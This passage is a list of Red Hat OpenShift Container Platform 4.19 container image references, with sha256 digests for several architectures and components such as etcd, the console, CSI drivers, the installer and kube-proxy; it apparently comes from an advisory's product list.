"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
